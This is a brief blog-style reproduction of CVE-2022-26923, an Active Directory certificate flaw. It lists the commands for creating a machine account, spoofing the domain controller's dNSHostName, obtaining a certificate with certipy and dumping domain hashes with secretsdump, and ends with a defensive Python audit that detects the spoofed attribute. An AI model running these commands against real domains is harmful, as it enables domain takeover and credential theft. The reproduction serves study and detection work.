[Domain Penetration] CVE-2022-26923
阿新 • Published: 2022-05-12
1. Vulnerability Reproduction
Create a new machine account:
python3 addcomputer.py 'redteam.com/tony:PassWord@123' -method SAMR -computer-name 'TonyPC' -computer-pass 'pass.123' -dc-ip 192.168.172.201
Set the relevant attributes:
https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
PS C:\Users\tony\Desktop> Import-Module .\Import-ActiveDirectory.ps1
PS C:\Users\tony\Desktop> Import-ActiveDirectory
PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -ServicePrincipalNames @{REPLACE="HOST/TonyPC","RestrictedKrbHost/TonyPC"} -Verbose
PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -DNSHostName $null
PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -DNSHostName dc.redteam.com
Request a certificate with certipy:
certipy req 'redteam.com/TonyPC$:PassWord@[email protected]' -ca REDTEAM-DC-CA -template Machine -debug
Authenticate with the certificate to obtain the DC hash:
certipy auth -pfx dc.pfx -dc-ip 192.168.172.201
Dump hashes:
python3 secretsdump.py 'redteam.com/[email protected]' -hashes :dd4390e7e449062d421301fef2c9ec7e
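A defender-side check for the directory state these steps leave behind, as an added example that is not part of the original post: it audits exported computer objects for a dNSHostName that collides with another account, does not match the sAMAccountName, or is not covered by any SPN. The record layout, the DC$ and WS01$ accounts and the function name are assumptions, and the sample data is constructed.

```python
from collections import defaultdict

# Constructed sample records, shaped like an LDAP export of computer objects.
# TonyPC and dc.redteam.com come from the walkthrough; DC$ and WS01$ are assumed.
SAMPLE = [
    {"sAMAccountName": "DC$", "dNSHostName": "dc.redteam.com",
     "servicePrincipalName": ["HOST/DC", "HOST/dc.redteam.com"]},
    {"sAMAccountName": "TonyPC$", "dNSHostName": "dc.redteam.com",
     "servicePrincipalName": ["HOST/TonyPC", "RestrictedKrbHost/TonyPC"]},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.redteam.com",
     "servicePrincipalName": ["HOST/WS01", "HOST/ws01.redteam.com"]},
]


def audit_computers(records):
    """Return {sAMAccountName: [reasons]} for suspicious computer objects."""
    findings = defaultdict(list)
    by_dns = defaultdict(list)
    for rec in records:
        sam = rec["sAMAccountName"]
        dns = (rec.get("dNSHostName") or "").lower()
        if not dns:
            continue  # attribute unset: nothing to compare
        by_dns[dns].append(sam)
        # 1. Host label of dNSHostName should equal the account name without '$'.
        if dns.split(".")[0] != sam.rstrip("$").lower():
            findings[sam].append("dNSHostName does not match sAMAccountName")
        # 2. A domain-joined machine normally has an SPN naming its own FQDN.
        spn_hosts = {s.split("/")[1].split(":")[0].lower()
                     for s in rec.get("servicePrincipalName", []) if "/" in s}
        if dns not in spn_hosts:
            findings[sam].append("no SPN references dNSHostName")
    # 3. Two accounts should never share a dNSHostName.
    for dns, sams in by_dns.items():
        if len(sams) > 1:
            for sam in sams:
                others = ", ".join(s for s in sams if s != sam)
                findings[sam].append("dNSHostName shared with " + others)
    return dict(findings)


if __name__ == "__main__":
    for account, reasons in audit_computers(SAMPLE).items():
        print(account, "->", "; ".join(reasons))
```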